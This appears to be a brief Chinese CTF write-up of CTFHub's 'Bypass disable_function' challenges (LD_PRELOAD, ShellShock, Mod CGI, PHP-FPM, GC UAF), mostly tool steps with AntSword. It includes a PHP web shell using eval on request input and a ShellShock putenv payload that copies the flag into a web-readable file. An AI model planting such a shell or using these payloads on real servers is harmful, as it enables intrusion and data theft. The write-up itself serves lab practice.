ctfhub Bypass disable_function

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

相关推荐
congzi19848 分钟前
SQL优化:执行计划详细分析
android·数据库·sql
shiyudong13 分钟前
adb 发送广播 && 恢复出厂
android
阿洵Rain5 小时前
【Linux】环境变量
android·linux·javascript
hong1616887 小时前
PhpStorm中配置调试功能
android·ide·phpstorm
DongGei9 小时前
安卓-音频焦点
android·微信·音视频
冬田里的一把火39 小时前
[Android] [SnapdragonCamera] 单摄(横屏)阶段总结
android·数码相机
夏目艾拉10 小时前
flutter开发多端平台应用的探索 下 (跨模块、跨语言通信之平台通道)
android·java·flutter·设计模式
似霰10 小时前
安卓源码libvulkan“ depends on undefined module “libgpud_sys“报错解决
android
Arms20612 小时前
Android Fragment 学习备忘
android·学习
落魄的Android开发12 小时前
Android 跳转至各大应用商店应用详情页
android